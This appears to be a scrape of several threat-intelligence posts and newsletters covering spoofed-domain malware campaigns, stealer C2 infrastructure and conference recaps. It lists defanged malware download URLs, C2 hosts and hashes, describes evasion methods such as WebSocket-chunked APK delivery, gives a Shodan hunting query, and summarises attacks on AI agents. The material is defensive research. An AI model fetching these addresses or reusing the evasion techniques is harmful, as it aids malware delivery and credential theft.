Starting in September 2024, a financially motivated cluster of more than 80 spoofed domain names and lure websites began targeting users with fake applications and websites themed as government tax sites, consumer banking, age 18+ social media content, and Windows assistant applications. The actor used these spoofed domains to deliver Android and Windows trojans likely for the purpose of stealing credentials or more overtly through the use of fake login pages.

Details

Windows Installation Assistant download themed websites such as the following were used to deliver Windows trojans.

ms32-download[.]pro

corp-ms32-download[.]pro

Download URL: https[:]//cozzystaysemarang[.]com/temp/winsetup-stable-windows_x86_x64_software_package_revision_final.exe

Filename: winsetup-stable-windows_x86_x64_software_package_revision_final.exe

Sha256: 3767140145cef85204ddec1285f5dc8544bfcf8ff22318c11073baaa476385fc

The same delivery domain was previously observed delivering APK files in June 2025.

APK Sha256: a83a442f930fea310d391f852385e3673d8c7128e5bbdc2b68217838c78381fa

More recent versions used a different domain with a long URL likely to hide the filename from automated security tools and, to a lesser extent, human review. The excessive spaces (%20 in URL encoding) and length may bypass some detection rules or regular expressions to match malicious patterns..

Download URL:

https[:]//fleetfedx[.]com/Installer%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20em_OtvJCxP1_installer_Win7-Win11_x86_x64.msi

SHA256: 71cd466073bf23b43111dbc68ccaf1064e737f3f9ffebfec9a6f5146af6a34b9

The download links also contain a Tracking Pixel in the on-click event: onclick="fbq('track', 'Lead');" This indicates that the attacker is running this as a campaign. They are likely using Facebook ads or other methods to drive traffic to this fake page and are tracking their "conversion rate", a metric of how many people they successfully trick into clicking the malicious download link.

Facebook Tracker Ids:

• 1354988235984551
• 690114973584418
• 1327164645166821

Additionally, a Yandex tracker was also identified in use: 97105740

Connective Tissue

Registrar

• PDR Ltd. d/b/a PublicDomainRegistry.com
• GMO Internet, Inc.

IP ISP

• BL Networks
• H2nexus Ltd
• H2.nexus Frankfurt Network

Name Server Domain

• regway[.]com

Top Level Domains

• Pro, Shop, Com, Icu, Top

Registrant Email Domains

• fviainboxes[.]com
• dropjar[.]com
• replyloop[.]com
• yopmail[.]com
• robot-mail[.]com
• protonmail[.]com

Trackers

• Facebook: 690114973584418
• Facebook: 1327164645166821
• Facebook: 1354988235984551
• Yandex: 97105740

The majority of the cluster’s domains targeted users with age 18+ themed TikTok, YouTube, and online Gambling Android applications. Other themes specifically involved several prominent consumer banks and cryptocurrency exchanges including USAA, PMC, Bloomberg, and Binance. A subset of the domains resolve fake Windows 11 Installation Assistant and TrustCon VPN application downloads. 

A breakdown of the cluster’s domain and websites by spoofed industries shows the majority are directly financially related, including the Government tax sites.

Sample screenshots of spoofed websites for malware delivery and credential harvesting:

Conclusion

This report highlights a persistent and financially motivated cybercrime operation employing common techniques, including spoofed domains and lure websites to distribute malware and harvest credentials. 

The most common lures preyed on curiosity and desire, which can override a user's normal caution. The promise of forbidden or exclusive content is a powerful social engineering tool. Subsequently, victims are often embarrassed to admit how their device was infected. They are less likely to report the malicious app to authorities, security vendors, or even their IT department, allowing the malware to persist longer and the campaign to remain undetected.

They operate with the mindset of a malicious marketing firm, prioritizing scale and conversion rates over high-level technical sophistication. The use of template-based website builders indicates a focus on rapid deployment and disposability of their infrastructure, allowing them to quickly pivot and evade takedowns, browser-based warnings, and blocklisting mechanisms.

Users are advised to exercise extreme caution when encountering unfamiliar links or download prompts, particularly those related to banking, social media, or system utilities.

IOCs

Emails

‍

Domains

The days are getting shorter, and so is the news cycle. 

It’s A Lot. 

Bright spots emerge from the pattern, and one of the brightest in a while occurred last week for me - LABScon. SentinelOne and various sponsors manage to gather nearly two hundred of the top cybersecurity folks every year to talk and listen to each other, and I was honored to be admitted this year. The agenda itself is public and tells you enough to know just what kind of impact speakers can have: human rights investigators, harassment fighters, nation-state espionage mitigators, and more. 

While a lot of it was TLP:RED, one thing I’m confident in sharing is the week showed me a community of folks intent and determined on doing good for the world. Many are positioned to follow through on that in some way and are excited to talk about it to a full room or one-on-one with a complete stranger. 

It’s a posture I’m trying hard to carry back from con and out into the world.

On another note, something I’m seeing more of that I want to flag for folks: RecordedFuture published a great report on Stark Industries workarounds to deal with EU sanctions, and Brian Krebs expanded upon it with a great post as well. 

One of the common themes in conversation alongside harder research lately has been the intermediate and long-term ineffectiveness of many of our interventions targeting malicious actors, groups, and campaigns. Takedowns are momentarily gratifying - as I’ve said before, we need to celebrate the wins where we can - but do not seem to provide longitudinal benefits. What does effective long term disruption look like, and is it feasible? What are the models, and what are the realities?

For my part, I’ve been looking at bad actors’ activities before and after US OFAC and UK OFSI sanctions to understand both preparation and reaction. Emerging from technical observables like DNS and BGP is an opaque but solid understanding that bad actors are much better at reliability engineering and disaster recovery than we want to admit, from domain mirroring all the way up to anticipatory Autonomous System takeover. I’ve submitted a talk to CYBERWARCON on the topic (and hopefully it’s accepted!), but if folks reading this know of work around long-term disruption, cybersecurity-related sanctions research, or adjacent topics, I’d love to hear from you. Please shoot me an email at CSRL at domaintools[.]com. 

Podcasts

Microsoft Threat Intelligence - Stopping Domain Impersonation with AI - I know, I know, I’m tired of AI all the time too. But it’s timely and important to stay on top of. Good conversation, especially around how the problem is one of scale rather than sophistication.

Three Buddy Problem - I can’t choose between them, so you get all three Live from LABScon episodes. 

• Lindsay Freeman on tracking Wagner Group war crimes - Hearing Freeman talk about this was heartbreaking, but the work her group does around this topic is inspiring. Deep, dark OSINT
  
• Visi Stark shares memories of creating the APT1 report - If nothing else listen for the excellent and hilarious dynamic between the hosts and Stark, but also, the interview carries some great insights on the history and current state of affairs of analysis and threat intelligence.

• Aurora Johnson and Trevor Hilligoss on China's 'internet toilets' - Great interview on toxic online communities in China. Also, I second Juan on “Spycloud is ****ing awesome.” 

Articles

The Record - Ransomware gang takedowns causing explosion of new, smaller groups - Immediately thought of research we conducted with Analyst1 and Scylla Intel and presented at SLEUTHCON earlier this year. Of particular interest is the finding that disruption tends to result in smaller groups reconstituting around critical trust relationships. 

Infoblox - Deniability by Design: DNS-Driven Insights into a Malicious Ad Network - Incredibly good work by Infoblox weaving deep technical details and deep narrative into a systematic understanding of not just malicious adtech but the behavior behind it and thorough methods to fingerprint and track it. 

Morningstar - Unit 221B Raises $5M in Seed Funding To Convert Threat Intelligence into Real World Arrests - You love to see it. Congratulations to our friends at Unit 221B, who should have people throwing large piles of cash at them all the time, given how excellent their work is. 

Google TIG - Another BRICKSTORM: Stealthy Backdoor Enabling Espionage into Tech and Legal Sectors - Targeting profile prioritized “legal services, Software as a Service (SaaS) providers, Business Process Outsourcers (BPOs), and Technology.” Excellent writeup by TIG, as always.

Schneier - Surveying the Global Spyware Market - Schneier highlights two important points: that investment in spyware companies has risen lately, and the role of brokers and resellers that often go unnoticed in the chain. 

Koi Security - First Malicious MCP in the Wild - Thousands of downloads a week and it’s copying every email to the dev’s personal server. Because the S in MCP stands for Security!

CSO - Why domain-based attacks will continue to wreak havoc - The dangerousness of these attacks long predated AI, including at scale, but this is a pretty good review of some domain attacks to take note of and ensure you’ve worked into your defenses and simulations.

Group-IB - Mapping the Infrastructure and Malware Ecosystem of MuddyWater - Not always the biggest fan of Group-IB, but indicators are indicators, and there’s some good work here about how Muddy Water’s tradecraft is evolving.

Microsoft - Microsoft seizes 338 websites to disrupt rapidly growing ‘RaccoonO365’ phishing service - Joint work between Microsoft DCU and Health-ISAC, highlighting the role RaccoonO365 has adopted in targeting the healthcare sector.

Research Papers and Reports

arXiv - Large Language Models for Security Operations Centers: A Comprehensive Survey - Not ground-breaking, but some valuable LLM/SOC fundamentals covered here.

Entertainment

GadgetReview - Massive Attack Turns Concert Into Facial Recognition Surveillance Experiment - Massive Attack hasn’t commented on data retention from the event, laying bare the ambiguity and lack of agency that goes unseen in all the other applications. A+

Since approximately August 2024, a group has been targeting Indonesian and Vietnamese Android users with banking trojans disguised as legitimate payment and government identity applications. The operators exhibit distinct domain registration patterns, often reusing TLS certificates and grouping domains to resolve to the same IP addresses, with a strong operational focus during Eastern Asia's daytime hours.

Details

The pattern was initially identified through the monitoring of suspicious site elements such as those associated to Google Play Store http.html:"VfPpkd-jY41G-V67aGc" that may suggest spoofed Play store websites for malware delivery. 

icrossingappxyz[.]com

The page contains fake buttons for Google Play Store and App Store application downloads. Clicking the Google Play starts an on-page download progression bar and then prompts for a file store download location on device. The Apple App Store link was nonfunctional.

The site uses an obfuscation wrapper with Socket.IO library, which enables real-time, bidirectional communication with a server. This is highly abnormal for a download page. Instead of linking directly to a file download, when a user clicks the Android button, it initiates a WebSocket connection: socket.emit('startDownload', ...). The server responds by sending the .apk file back to the browser in many small chunks. The browser listens for these with “socket.on('chunk', (chunk) => { chunks.push(chunk); });”. As the server sends data, it also sends progress messages (downloadProgress). The script uses these to update the on-screen progress bar, making the user believe a normal download is occurring. When the server sends the “downloadComplete” message, the script combines all the chunks in memory and sets the type to 'application/vnd.android.package-archive', the MIME type for an APK file. It then creates a temporary local URL for the file and creates an invisible <a> link, pointing to the temporary file URL and programmatically clicks it. This initiates a user download prompt from the browser. 

The malicious site operators likely attempted to evade detection and hide their malware store through the elaborate download method. Network security and firewalls might be configured to block direct downloads of .apk files. However, by hiding the file transfer inside WebSocket traffic, it can often slip through undetected. Since there is no static URL pointing to the malicious file, automated security scanners that crawl websites looking for malicious links will not find it.

It is worth noting that some browsers correctly flagged these downloads as suspicious with download warning prompts such as the following:

IdentitasKependudukanDigital.apk

1f9253092c5a2abdb7bc3d93fccad85f23ce5bfde38377c792a242f045afcdb5

The file was detected as BankBot.Remo.1.origin, a previously closed source banking trojan that had its source code leaked on Russian-language forums in 2016. This has resulted in many variants.

Other much more commonplace malware delivery sites were also used such as the following spoof of M-Pajak, a tax payment app. It simply spoofs the Google App Store page and has a direct download URL to the malicious file stored on the server. Notably, the site used a mix of Thai, Vietnamese, Portuguese, and Indonesian language in the HTML code instead of dynamically inserting the correct language strings based on the visitor's Accept-Language header or GeoIP. This suggests these are template files used by unsophisticated operators. 

twmlwcs[.]cc

Download URL: https[:]//twmlwcs[.]cc/tax-app/M-Pajak.apk

M-Pajak.apk

SHA256 Hash: e9d3f6211d4ebbe0c5c564b234903fbf5a0dd3f531b518e13ef0dcc8bedc4a6d  

The downloaded file is also a loader for BankBot and is configured with the following C2 domains: 

saping.ynhqhu[.]com
aaping.ynhqhu[.]com
admin.congdichvucongdancuquocgia[.]cc
admin.outdoormovietheaters[.]com

Of the over 100 domains identified in this activity for malware distribution, there were a very limited number of variations in the spoofed content used for delivery. There were slight variations as can be seen from the following sample screenshots in addition to following the fake verification trends that have become commonplace over the past year. 

The group also has a nice habit of keeping their malware in open web directories such as the following:

Open Index of dgpyynxzb[.]com

Open Index of ykkadm[.]icu

indiemusicacademi[.]com

Domain Registration Patterns

Over the past 12 months, the actor was observed using distinct domain registration patterns. This often included the reuse of TLS certificates on two domains and grouping multiple domains to resolve to the same IP addresses. 

• ISP:
  • Alibaba
  • Scloud
  • CloudFlare
• IP Country: SG, ID
• Common Website title and page:
  • Identitas Kependudukan Digital- Apps on Google Play
• Server Type: nginx
• Nameserver:
  • share-dns[.]net 
  • cloudflare[.]com
• SSL Issuer: R10, R11, WE1
• Registrar:
  • Gname.com Pte. Ltd.

The most prolific registration patterns were the use of Alibaba ISP, Gname Registrar, and share-dns[.]net nameservers. 

Heatmaps showing the domain registration (left) and first seen DNS requests (right) with the time of day (UTC) over the year.

With the heatmaps for both domain registration and first seen DNS resolutions showing a visually similar grouping, it can also be observed that the delta relative to the domain registrations and first seen DNS requests averaged 10.5 hours over the year. This suggests the domains may be consistently operationalized quickly after registration though not nearly as rapidly as other more prominent cyber crime groups. 

The time data shows a strong grouping around eastern Asia's daytime hours, as is expected with the likely focus on targeting Indonesian and Vietnamese mobile users. It may also suggest the operators are working during the same times, if not also located in the same region.

Conclusion

The malicious operators employed some methodologies to bypass network security that might block direct downloads and prevent static URL-based security scanners from detecting the malicious files. However, it is worth noting that some browsers correctly flag these downloads as suspicious, displaying warning prompts to users and serving as a crucial line of defense for end users. Additionally, several commonplace methodologies employed prominently by less sophisticated financially-motivated groups such as spoofing Google Play Store allow for the identification of these spoofed malware delivery sites. The consistent use of Alibaba ISP, Gname Registrar, and share-dns[.]net nameservers across their operations provides a clear footprint of their infrastructure. While some spoofed sites, like twmlwcs[.]cc, show mixed language code possibly indicating template use by less sophisticated elements, the overall campaign exhibits a coordinated approach to malware delivery. Overall it is likely financially motivated and suspected of being operated by a group in the same region.

IOCs

Domains (see them on our Github as well)

Sha256 Hashes

And now we enter the belly of the beast.

Summer is in its full effect in the United States as many of us return from the surface of the sun Hacker Summer Camp in Las Vegas (covered in a separate post here). Post-BlackHat and DEF CON also arrives with an abundance of gifts for practitioners and researchers: the publication of tons of new research. As always, the items linked below aren’t intended to be a round-up but rather what caught attention internally, having stood out from the rest. 

The rest of the year looms, but not without hope. 

There are some signs that spending freezes are easing up and hiring may be easing up. Even in this heat, that’s cold comfort for those in the middle of the job hunt. It’s never been harder or more filled with frustration, dead ends, and deeper hazards like identity theft or financial scams. If you’re in a place to help, try to do what you can. 

If you’re still on the hunt, keep pushing, and get through however you can. 

Podcasts

Adversary Universe from Crowdstrike - Live at Black Hat: What’s AI Really Capable Of? - 33min - Good, grounded (but relatively upbeat) perspective on AI capabilities for both defenders and attackers. Also some interesting recent attack campaigns seen, including one with convincing multi-persona smishing threads (no evidence of AI in this latter, yet). 

CyberWire Research Saturday - Beyond the smoke screen - 22min- Excellent interview with Dr. Renee Burton of Infoblox Threat Threat Intel detailing their extensive work on the VexTrio cybercriminal group. They gave a great BlackHat briefing on this topic, and the interview is similarly compelling in both technical and behavioral aspects.

Prompt||GTFO - Youtube playlists for episodes one, two, three - ~90min each - Fascinating series of “prompt pits” in which mostly infosec practitioners get together to share use cases and experiences with AI, with a strict “no slides” rule, demos only. Not an endorsement of AI, but interesting to see how practitioners are using it, and most views involved are pretty reasonable and experience-driven. 

Articles

Infoblox - VexTrio Origin Story, Unmasked, and Inside the Robot - A three-part investigation highlighting world class-level research by Infoblox Threat Intel into the evolution, behavior, and technology of a major adtech-related spam and scam actor. Highly recommended to read all three in order to get a better idea of what you end up looking at in the wild. 

Analyst1 - Ransomware Diaries Volume 7: “I Had to Take the Guilt For Everyone” – The Kaseya Hacker Breaks His Silence - Jon DiMaggio’s DEF CON talk with Jon Fokker gripped a full theater for an hour, and the accompanying blog post is even better. There are few investigators on his level, and even fewer storytellers.

Wunderwuzzi - Claude Code: Data Exfiltration with DNS (CVE-2025-55284) - Okay. So. I’m trying to be less adversarial towards GenAI, really I am. But when you allowlist a bunch of bash commands for your autonomous agent and include DNS lookups, you clear a direct path for a long-known and well-researched data exfiltration and command & control method. And then I have to get all mad and shouty again. 

RiskyBulletin - Hackers sabotage Iranian ships at sea, again - “According to an analysis of the leaked files, the group hacked the company's network, identified all maritime communications terminals in its MySQL database, and then deployed malicious code to each ship's satellite terminal that wiped its disk storage.” 

TechCrunch - North Korean spies posing as remote workers have infiltrated hundreds of companies, says CrowdStrike - What I can’t decide is if the seeming overwhelming success of this campaign is down to good execution on the part of DPRK or the sad, sad state of enterprise security, especially whenever it causes friction in hiring processes.

Cofense - Spain TLD’s Recent Rise to Dominance - Anecdotally I’d been seeing .es show up in my investigators more lately even before reading this, and once the article crossed my desk it made more sense. 

Research Papers and Reports

Greynoise Intelligence - Early Warning Signals: When Attacker Behavior Precedes New Vulnerabilities - Greynoise looked backward and found that in 80% of cases, a spike in attempted attacks on a particular technology presaged a CVE release for that technology within six weeks. Excellent work and findings, worth reading the full report. Also covered by Research Saturday interviewing Greynoise VP of Data Science Bob Rudis (30min). 

RecordedFuture - Cloud Threat Hunting and Defense Landscape - In which Insikt Group lays out five prominent attack vectors threatening cloud environments, including details on common misconfigurations as well as logging and hunting internally.

CAIDA - Hunting in the Dark: Metrics for Early Stage Traffic Discovery - “Using a metric for discoverability, we model the ability of defenders to measure Crackonosh traffic as the malware population decreases, evaluate the strength of various detection methods, and demonstrate how different darkspace sizes affect both the ability to track the malware, but enable emergent behaviors by exploiting attacker mistakes.”

arXiv - Security Challenges in AI Agent Deployment: Insights from a Large Scale Public Competition - Results of wide-scale competitive testing across several dozen agents and models, with an eye to evaluating attack transferability and common vulnerabilities. Some significant findings, including limited correlation between size, robustness, or inference-time, meaning that the “better” and “bigger” models didn’t do better than the bargain basement models. 

Tools and Resources

CSO Online - CISA releases Thorium, an open-source, scalable platform for malware analysis - Curious to see where this goes, relative to NSA’s Ghidra.

Entertaining Reading

Wikipedia - The Berners Street Hoax - “Hook spent six weeks sending between a thousand and four thousand letters to tradespeople and businesses ordering deliveries of their goods and services to 54 Berners Street, Westminster, at various times on 27 November 1810.”

Details

Hunting for new malware delivery infrastructure often entails the identification and tracking of common techniques to deliver various stages of malware. Take malware-as-a-service providers for instance, some commonalities in a recent activity cluster entailed the use of hosted powershell scripts acting as a reference to the next malware to download and execute. 

Multiple clusters of stealer activity were observed through early July using PowerShell scripts as an intermediate stage for malware delivery. Creating multiple stages of delivery reduces the initial risk of exposing all malware and associated infrastructure if it is detected early on in execution. It may also slow down response investigations and analysis. 

Hunting for malicious web hosted PowerShell scripts can be as simple as using a Shodan query such as: http.html:"Invoke-WebRequest”.

Example Finding:
77.110.118.195 Resolved malicious domain “alababababa[.]cloud”.

A reused web-hosted powershell script to retrieve a malicious executable, build.exe, which it then starts as a new process.

Filename: build.exe
Sha256: 7ada4d7dfc00943780cb51ea182c7a221953cdabc394011204ba5cd8e4e8f0d3

This script acts as a trojan and connects to a commonly used C2 domain “anodes[.]pro”, which has communicated with more than60 malicious files in the past 2 months, including multiple stealer malware families such as Amadey, Lumma,  Luca, DeerStealer, and RedLine as well as other malware families Rugmi, BlackBasta and DarkGate.

Expanding on the domain behavior in VirusTotal, one additional DeerStealer sample was identified, which also used the same C2 domain. 

Sha256: bd269a6328de0e534f4d8c3a42ea88a4343168053f63da0da95318f4ed17e705

Expanding on the associated infrastructure of the identified intermediary domain “alababababa[.]cloud” through domain registration overlaps identified potentially related activity.

• NameServer: cloudflare[.]com
• IP ISP: CloudFlare Inc
• Address: compliance_abuse[@]webnic[.]cc
• Registrar: WebNIC
• SSL Issuer: WE1

‍

Repeating the previous steps identifies additional malware with commonalities in stealer and C2 usage such as Amadey malware being observed with domain “hugevcdn[.]pro”.

Sha256: 02c158c63d28fd5be24424e41b70a7a361c9be8897590c0453b0d30bd6e0d842
C2: "185.156.72[.]96/te4h2nus/index.php

Similar but considerably higher volume to the C2 domain “anodes[.].pro”, the C2 IP 185.156.72[.]96 has been observed with over 2,700 malicious files communicating to it. Notably with many of the same wide range of malware-as-a-service families using it as a C2.  

In addition, many of the malicious files for LummaStealer and Amadey shared a common C2 IP “185.156.72[.]96” and overlaps with a previous LummaStealer IP “185.156.72[.]2”.

Both IPs are part of an obscure ASN (AS61432) TOV VAIZ PARTNER. This ASN has only one prefix (185.156.72.0/24), which shows only 1 out 719 BGP peer propagations for Hurricane Electric Services. The ASN claims Ukrainian origin and appears to only be propagated by 1 other ASN, AS50073 Webcraft Found LLC in Ukraine. This may generally suggest the ASN is part of a BPHS, bulletproof hosting service.

Example LummaStealer C2s associated to IP 185.156.72[.]2 and 185.156.72[.]96 and anodes[.]pro

‍

Noting a reused SSH certificate “hash:896675070” and “hash:-434889431” from the C2 IP address identifies several historic overlaps such as the following recent IPs:

‍

In addition to indications that the large cluster of malware employs Amazon CloudFront, Amazon Global Accelerator EC2s, and Github user content being used to store and distribute malware. All of which create challenges in proactively blocking malicious domains.

Example 1:
https[:]//raw.githubusercontent[.]com/peterson643eu/projecttop/36b05b6030459ba5435705d8b91aae11f0ba268b/NIOAHYWM.exe
https[:]//raw.githubusercontent[.]com/peterson643eu/projecttop/6fd8d0859aa9d3d300bf79f3da8032b04b1ed540/OURDUBDV.exe
https[:]//github[.]com/peterson643eu/projecttop/raw/refs/heads/main/OURDUBDV.exe

Makes request to http[:]//nexuswarps[.]shop/c
C2s: anodes[.]pro, multiport[.]shop

SSL Hash overlaps with a CloudFront IP resolving “70d9ae273c860e606f236c528381f9ca[.]cloudfront[.]net” suggests the CloudFront service may be used to relay traffic to another endpoint serving malware.

Sampling 200 of the communicating files with meaningful detection names in VirusTotal and limiting to the past 3 months there is an overrepresentative share of LummaC2 and Amadey.

Despite law enforcement takedowns targeting LummaStealer infrastructure in May 2025, it appears Lumma is still operating and continues to be a prominent choice. Though we speculate that this particular cluster of malicious activity decidedly experimented with alternative choices during the month of June and may have opted to continue operations with LummaStealer.  

Conclusion

Despite a May 2025 law enforcement takedown targeting LummaStealer, the malware family appears to remain active and a popular choice for threat actors, particularly through bulletproof hosting services (BPHS) IPs. This analysis of observed malicious activity, with a focus on C2 IPs 185.156.72[.]96 and 185.156.72[.]2 (both part of AS61432, a suspected BPHS), suggests that while there may have been some experimentation with alternative malware during June, operations have largely continued with LummaStealer.

IOCs

Hacker Summer Camp recedes into the rearview mirror and the world starts back up again.

Morning standup. Q3 sprint. Follow-ups and circle-backs. But perhaps we’re changed. Perhaps we re-enter the frays in a slightly different way, shedding data of a marginally changed nature. Philosopher and media theorist Marshall McLuhan said that as a species, “We look at the present through a rear-view mirror” in our “march backwards into the future.”

He continued: “Because of the invisibility of any environment during the period of its innovation, man is only conscious of the environment that has preceded it; in other words, an environment becomes fully visible only when it has been superseded by a new environment.”

Does the landscape after BSidesLV, Black Hat, and DEF CON count as a new environment? Could the information gleaned, hands shaken, and drinks shared change us significantly going forward?

For my part, I always emerge from this week in Las Vegas and find my surroundings drawn into sharper relief. Finer lines mark more edges, but they also bring us together in more ways, if we let them. Light sources are brighter, or revealed as so bright they hid now-revealed details, like a message written on the lightbulb only visible in the briefest of moments upon flicking the switch off. 

McLuhan’s observation in mind, that may be my sign that our chaotic week of community each year marks a new environment, superseding the old and making the latter finally visible. 

Or perhaps that I just need more sleep this year.

—-------

Folks often pose the question: “Which is better, Black Hat or DEF CON?”

The real answer is, “It depends.” 

Black Hat starts the week out with everyone fresh and wide-eyed, staring down the barrel of at least six days of scrambling if they attend both conferences. It is to my benefit that we take care of the business end first before the social and sensory overwhelm hits - I’m much more articulate and sociable, moving mountains to meet practitioners, collaborators, and customers. Discussions are more hard-nosed, shorter, and more focused. Metrics rule the day.

That being said, Black Hat is a delight of a different sort. It’s a much more focused and organized entity rather than creeping chaos. Meeting up with other practitioners and talking shop involves a lot less small talk, with a substantial chunk of theory discussion and an even larger space held to talk practice. 

Plus, less bare concrete. 

One highlight of my Black Hat arrived early; my first briefing was From Prompts to Pwns: Exploiting and Securing AI Agents, presented by NVIDIA AI Red Teamers Rebecca Lynch and Rich Harang. Lynch and Harang began by providing an excellent technical foundation. Points included LLM compromise as enabled by a “universal anti-pattern” that allows for the attacks, as well as agentic autonomy classifications and their relation to both systems architecture and the introduction of nondeterminism into the system. They then pivoted to the practical nature of their red teaming and the realities that informed it. LLM guardrails are mostly just other LLMs performing checks, and so subject to similar attacks. And since these platforms are often crawling the web, the ability to introduce untrusted content spans the entire Internet. Specific technical observables included Cursor rules files, ASCII smuggling, and more. And the idea that malicious actors can more effectively use LLMs to socially engineer the user than other technologies was a brilliant insight.

The talk was equal parts funny and grim, and I’m now hungry to see more from NVIDIA’s AI Red Team.

Another highlight came from the venerable Threat Intel team at Infoblox, No Hoodies Here: Organized Crime in AdTech. The talk revolved around long-term and fascinating research around spam & scam cybercriminals VexTrio, accompanied by the second in Infoblox’ blog series on the group (you can find the first post here). Their research laid bare the evolution of VexTrio into an adtech powerhouse of villainy, complete with Instagram photos of their fast cars, lavish meals, and expensive boats. A deep understanding of both the technologies involved and the human behavior behind them emerged through excellent research and storytelling.

—-------

DEF CON is, of course, an entirely different animal. It’s about one-tenth the price, and I’d guess at least twice the size of Black Hat. And the chaos only ends where the concrete does too (that’s not hyperbole by the way, the floors are all concrete, bring good shoes and ibuprofen).

Now that DEF CON has moved to a single venue it’s become a little more manageable, and staff learned the ins and outs of the new complex last year and applied those lessons to great effect. Attendance is much wider spread than Black Hat, with enthusiasts and other kinds of technologists in attendance. 

There’s more swagger, but there’s also more joy; folks assembling under an umbrella of energetic curiosity and irreverence and self-organizing across a number of villages as well as the main stage talks. 

We were able and honored to show up to and share with DEF CON 33 in a big way three separate talks in three separate villages. 

DNS Scavenger Hunt
Security Advisor Malachi Walker gave an interactive talk at the Blacks in Cyber Village: Following Threat Actors’ Rhythm — to Give Them More Blues. The talk provided indicators to follow around threat actor activity and then engaged the crowd in a DNS-based scavenger hunt from the terminal.

Malware in DNS
Malachi Walker and Senior Security Operations Engineer Ian Campbell spoke on investigative findings in the Malware Village: Plain TXT, Malicious Context: Uncovering DNS Malware. Included were DNS investigation basics, and then several real-world examples of DNS TXT records being used for malware storage and retrieval as well as the step-by-step detection specifics. There’s a bonus round at the end of the slide deck for folks interested in domain mysteries!

Pre-Identifying DNS Wildcards: A New Standard of Care
CISO and Head of Investigations Daniel Schwalbe presented original research and enablement at Recon Village. Informed by a DEF CON 31 win at the Subdomain Enumeration Contest, an alternative method identifying 100 times the winning results required a parallel new solution to identifying and removing wildcarded domains.

Of course, other folks were there too. A LOT of them, actually. And many giving great talks on stages or in villages. Yale Grauer in the Crypto and Privacy Village on Cyber Defenses, cooperq and oopsbagel in the hackers.town community on Rayhunter Internals, and our friend Jon DiMaggio co-speaking with Jon Fokker on the Track 5 stage spilling the tea about a REvil actor, to name just a few. This latter was a fantastic talk that showed the deep and inextricable connection between ransomware observables, human behavior, and group dynamics with substantial realness. 

Summer in Las Vegas is always hot, and uncomfortable, and packed with people. But at the same time, filled to the brim with joy and curiosity, serious business alongside frenetic nerdery. Different but often parallel strains of justice running through many diverse communities celebrating their uniqueness and their shared loves and interests simultaneously. 

I don’t know of another week like it anywhere, and I wouldn’t have it any other way.

(except for maybe the concrete floors.)

Join our teams as they share their DEF CON talks on Tuesday, September 30: https://www.domaintools.com/defcon-session-recap-customer-webinar/

It is a lovely day in information security,

and you are a horrible goose.

We’re a week away from Hacker Summer Camp, and I’m curious: similar to the writer conversation of “plotters versus pantsers” are your shenanigans all lined up in advance, or are your Vegas shenanigans more opportunistic and inspired by the moment? Do you carefully clean and arrange your tools, pack and unpack and repack in advance? Or do you live off the land and a few strips of rusty aluminum stripped from a can of Surge in 1997 and tucked in your wallet ever since?

Unless of course you’re the type of person to avoid shenanigans. Apparently those people exist.

This year’s Hacker Summer Camp includes some steam to vent. We’re charging into the desert amidst a cloud of hot dust and exploited Sharepoint embers, a mass-breach of women’s data after they sought safer dating, a new technology seemingly bent on speedrunning all the lessons computing has learned the hard way, and that’s not even getting into this year’s complexities around domestic agency capabilities. Everything considered, it’s enough to turn to nihilistic partying to cope.

But what I expect to see more of, what I’ve seen from the various clusters assembling for BlackHat, DEF CON, and BSides Las Vegas, is community. It’s our strongest power and our greatest defense. It’s often said that the Internet perceives censorship as damage and routes around it; and there may be drama, there may be dark points, there may be jerks, but community can react to damage the same way. And in many cases, it is.

Find the others. Reach out. Make grand collaborative plans, scale them back, amplify them further. Make room for the quieter voices. And don’t forget to make time to play.

Next week, let’s come to play. 

Podcasts

Lawfare - The Double Black Box: Ashley Deeks on National Security AI - Excellent, thoughtful exploration of ‘the idea that the use of artificial intelligence in the national security space creates a "double black box." The first box is the traditional secrecy surrounding national security activities, and the second, inner box is the inscrutable nature of AI systems themselves, whose decision-making processes can be opaque even to their creators.’ I picked up Deeks’ book immediately after listening to the podcast.

Srsly Risky Biz - Four key players drive Scattered Spider - Some interesting conclusions coming out lately. For instance, incident response investigators cross-referencing incidents attributed to SCATTERED SPIDER keep running across the same voices in voice-delivered social engineering attacks. Also, a few folks playing “Project Manager” roles. 

Articles

Okta - Okta observes v0 AI tool used to build phishing sites - Cheat-sheet style hint here: most Vercel-built sites have telltale DNS records CNAMEing back to vercel[.]com subdomains, and use vercel-dns[.]com nameservers. Maybe start building that into your detections and reassess once Vercel gets a handle on this. Looking at their nameservers for domains first seen July 28, I saw multiple career/application/hiring domains pretending to be from major corporations, several attempts at emulating the customer service platform of a major mobile provider, attempts to emulate adclick revenue and CRM platforms, and more. Just one day’s worth of new AI creations.

Proofpoint - NET RFQ: Request for Quote Scammers Casting Wide Net to Steal Real Goods | Proofpoint US - Good work by Proofpoint here amidst a fascinating scam leveraging “net-30” type financing to get goods or services, and then vanish. 

Resecurity - Cybercriminals Attack Seychelles – Offshore Banking as a Target - Well. That’s a shame.

The Record - Russian bulletproof hosting service Aeza Group sanctioned by US for ransomware work - Within a few days they started shifting their nameservers, and the primary ASN moved behind another Russia-aligned BGP safewall for its announcements. One of these days I need to dive deeper into technical observations after international sanctions; if you’ve got good examples, please reach out. 

knostic.ai - Exposing the Unseen: Mapping MCP Servers Across the Internet - Knostic (the startup brainchild of Gadi Evron and Sounil Yu) doing some great foundational fact-finding here around how organizations are deploying Anthropic’s Model Context Protocol. Unsurprisingly, the news isn’t good. 

Cisco Talos - Cybercriminal abuse of large language models - General but good roundup on some of the malicious uses seen in the wild. 

Lawfare - AI and Secure Code Generation - I don’t necessarily agree with everything, but Geer and Aitel know their stuff and make some very good points. 

Reuters - China-linked hackers target Taiwan's chip industry with increasing attacks, researchers say 

DTI - Malware in DNS - This was a quick but clever piece by one of our researchers that struck far louder chords than we expected. 

FT - Disinformation warriors are ‘grooming’ chatbots - LLM-grooming is the new cache poisoning, pass it on.

Research Papers and Reports

Censys - 2025 Sate of the Internet Report 

